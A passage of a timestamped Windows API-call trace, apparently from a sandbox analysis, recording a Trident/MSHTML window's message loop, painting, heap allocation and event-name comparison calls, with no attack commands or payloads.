hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.634] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.635] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0161.635] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0161.635] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a188 | out: phwnd=0x19a188) returned 0x80004005 [0161.635] NtdllDefWindowProc_W () returned 0x1 [0161.637] NtdllDefWindowProc_W () returned 0x0 [0161.637] NtdllDefWindowProc_W () returned 0x0 [0161.643] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0161.643] IsIconic (hWnd=0x103e0) returned 0 [0161.643] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a17c | out: lpRect=0x19a17c) returned 1 [0161.643] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0161.643] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a17c | out: lprcDst=0xd0c5bc) returned 1 [0161.643] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0161.643] CopyRect (in: lprcDst=0x19a05c, lprcSrc=0x19a17c | out: lprcDst=0x19a05c) returned 1 [0161.643] IntersectRect (in: lprcDst=0x19a06c, lprcSrc1=0x19a05c, lprcSrc2=0x19a17c | out: lprcDst=0x19a06c) returned 1 [0161.643] EqualRect (lprc1=0x19a06c, lprc2=0x19a05c) returned 1 [0161.643] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x88040a6c [0161.643] GetUpdateRgn (hWnd=0x103e2, hRgn=0x88040a6c, bErase=0) returned 2 [0161.644] ValidateRgn (hWnd=0x103e2, hRgn=0x88040a6c) returned 1 [0161.644] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0161.644] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0161.644] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a004*=66530, plResult=0x199e60 | out: plResult=0x199e60) returned 0x1 [0161.644] NtdllDefWindowProc_W () returned 0x0 [0161.644] GetCurrentThreadId () returned 0xb48 [0161.644] InvalidateRgn (hWnd=0x103e2, hRgn=0x88040a6c, bErase=0) returned 1 [0161.644] DeleteObject (ho=0x88040a6c) returned 1 [0161.644] GetCurrentThreadId () returned 0xb48 [0161.652] NtdllDefWindowProc_W () returned 0x0 [0161.653] NtdllDefWindowProc_W () returned 0x0 [0161.660] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0161.660] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a188 | out: phwnd=0x19a188) returned 0x80004005 [0161.660] NtdllDefWindowProc_W () returned 0x1 [0161.662] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0161.663] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0161.664] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0161.664] NtdllDefWindowProc_W () returned 0x0 [0161.664] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0161.664] NtdllDefWindowProc_W () returned 0x0 [0161.664] NtdllDefWindowProc_W () returned 0x0 [0161.664] NtdllDefWindowProc_W () returned 0x0 [0161.664] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0161.664] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0161.664] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0161.665] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0161.665] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ee8 | out: lpPoint=0x199ee8) returned 1 [0161.665] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ba8 | out: lpPoint=0x199ba8) returned 1 [0161.665] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ba8 | out: lpPoint=0x199ba8) returned 1 [0161.666] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0161.666] GetMessagePos () returned 0x11e01d6 [0161.666] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199ddc | out: plResult=0x199ddc) returned 0x1 [0161.666] NtdllDefWindowProc_W () returned 0x0 [0161.666] GetCurrentThreadId () returned 0xb48 [0161.666] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0161.666] GetMessagePos () returned 0x11e01d6 [0161.666] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199ad4 | out: plResult=0x199ad4) returned 0x0 [0161.667] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0161.667] GetMessagePos () returned 0x11e01d6 [0161.667] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.667] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.667] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.667] memcpy_s (in: _Destination=0xd6f7a0, _DestinationSize=0x118, _Source=0xd6f680, _SourceSize=0x118 | out: _Destination=0xd6f7a0) returned 0x0 [0161.667] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dca60 [0161.668] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0161.668] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0161.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dca60 | out: hHeap=0x5e0000) returned 1 [0161.669] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.669] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.669] memcpy_s (in: _Destination=0xd6f8c0, _DestinationSize=0x118, _Source=0xd6f680, _SourceSize=0x118 | out: _Destination=0xd6f8c0) returned 0x0 [0161.669] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dc840 [0161.669] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.670] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0161.670] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0161.670] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0161.671] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0161.672] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0161.672] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0161.672] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0161.672] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc840 | out: hHeap=0x5e0000) returned 1 [0161.672] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x199394 | out: plResult=0x199394) returned 0x0 [0161.672] GetCurrentThreadId () returned 0xb48 [0161.672] GetCurrentThreadId () returned 0xb48 [0161.673] NtdllDefWindowProc_W () returned 0x0 [0161.673] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0161.673] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0161.673] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0161.673] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0161.673] GetAncestor (hwnd=0x103ba, gaFlags=0x2) returned 0x70258 [0161.673] IsIconic (hWnd=0x70258) returned 0 [0161.673] GetCurrentThreadId () returned 0xb48 [0161.673] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0161.673] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0161.673] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0161.673] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0161.673] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.673] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.674] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0161.674] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098049317457) returned 1 [0161.674] NtdllDefWindowProc_W () returned 0x0 [0161.674] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0161.674] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0161.674] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0161.675] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0161.675] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0161.675] IsIconic (hWnd=0x103e0) returned 0 [0161.675] GetCurrentThreadId () returned 0xb48 [0161.675] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0161.675] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0161.675] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0161.675] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0161.675] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.675] GetCurrentThreadId () returned 0xb48 [0161.676] GetCurrentThreadId () returned 0xb48 [0161.676] GetFocus () returned 0x0 [0161.676] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0161.676] GetCurrentThreadId () returned 0xb48 [0161.676] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098049517822) returned 1 [0161.676] GetCurrentThreadId () returned 0xb48 [0161.676] GetCurrentThreadId () returned 0xb48 [0161.676] GetCurrentThreadId () returned 0xb48 [0161.677] QueryPerformanceCounter (in: lpPerformanceCount=0x19a314 | out: lpPerformanceCount=0x19a314*=3098049554322) returned 1 [0161.677] QueryPerformanceCounter (in: lpPerformanceCount=0x19a258 | out: lpPerformanceCount=0x19a258*=3098049571412) returned 1 [0161.677] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.677] MulDiv (nNumber=442, nNumerator=100, nDenominator=100) returned 442 [0161.677] MulDiv (nNumber=256, nNumerator=100, nDenominator=100) returned 256 [0161.677] GetFocus () returned 0x0 [0161.677] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a21f) returned 0 [0161.677] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.680] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.680] QueryPerformanceCounter (in: lpPerformanceCount=0x199dd8 | out: lpPerformanceCount=0x199dd8*=3098049890739) returned 1 [0161.680] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0xb010541 [0161.680] CreateRectRgnIndirect (lprect=0x199d78) returned 0x89040a6c [0161.680] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199db8, cPoints=0x1 | out: lpPoints=0x199db8) returned 21823995 [0161.680] GetRandomRgn (hdc=0xb010541, hrgn=0x89040a6c, i=4) returned 1 [0161.680] OffsetRgn (hrgn=0x89040a6c, x=-507, y=-333) returned 2 [0161.680] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199dc8, cPoints=0x1 | out: lpPoints=0x199dc8) returned 21823995 [0161.680] GetRegionData (in: hrgn=0x89040a6c, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0161.680] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x6cf328 [0161.680] GetRegionData (in: hrgn=0x89040a6c, nCount=0x30, lpRgnData=0x6cf328 | out: lpRgnData=0x6cf328) returned 0x30 [0161.680] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cf328 | out: hHeap=0x5e0000) returned 1 [0161.681] DeleteObject (ho=0x89040a6c) returned 1 [0161.681] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x6cf328 [0161.681] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x6cf328) returned 0xb040a78 [0161.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cf328 | out: hHeap=0x5e0000) returned 1 [0161.681] SelectClipRgn (hdc=0xb010541, hrgn=0xb040a78) returned 2 [0161.681] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x6cf328 [0161.681] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x6cf328) returned 0x8a040a6c [0161.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cf328 | out: hHeap=0x5e0000) returned 1 [0161.681] ValidateRgn (hWnd=0x103e2, hRgn=0x8a040a6c) returned 1 [0161.681] DeleteObject (ho=0xb040a78) returned 1 [0161.681] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.824] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d98 [0161.843] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dc840 [0161.843] GetSysColor (nIndex=15) returned 0xf0f0f0 [0161.844] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0161.844] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.845] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0161.845] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0161.845] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0161.845] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.845] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.845] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0161.845] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0161.845] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0161.845] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.845] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.845] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0161.845] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0161.845] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0161.845] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.845] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.846] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0161.846] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0161.846] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0161.846] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.846] GetSysColor (nIndex=15) returned 0xf0f0f0 [0161.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.846] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0161.846] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0161.846] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0161.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.847] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0161.847] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0161.847] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0161.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.847] LsSetDoc () returned 0x0 [0161.847] LsCreateLine () returned 0x0 [0161.852] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.852] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.853] LsdnFinishRegular () returned 0x0 [0161.853] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0161.854] GetProcAddress (hModule=0x65d00000, lpProcName=0x28) returned 0x65d0ea50 [0161.854] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x197fe0 | out: lpflOldProtect=0x197fe0*=0x4) returned 1 [0161.855] LsDisplayLine () returned 0x0 [0161.855] IOleInPlaceFrame:SetMenu (This=0xd90580, hmenuShared=0x7148, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.855] LsDestroyLine () returned 0x0 [0161.855] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.855] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.855] LsGetRubyLsimethods () returned 0x0 [0161.855] LsGetTatenakayokoLsimethods () returned 0x0 [0161.855] LsGetHihLsimethods () returned 0x0 [0161.855] LsGetWarichuLsimethods () returned 0x0 [0161.856] LsGetReverseLsimethods () returned 0x0 [0161.856] LsCreateContext () returned 0x0 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x630038 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d83f8 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6dd668 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d8488 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x6d9f50 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9908 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98b8 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db748 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d99f8 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9e30 [0161.856] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9d68 [0161.857] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c78 [0161.857] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x6da240 [0161.857] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.857] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.857] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.857] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x6da648 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67bbd8 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdbc0 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x6cb4a0 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6cb5d8 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x9efee68 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b8c0 [0161.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9eff0e8 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6cdc88 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x6bc3d0 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68d5f8 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x9eff280 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, 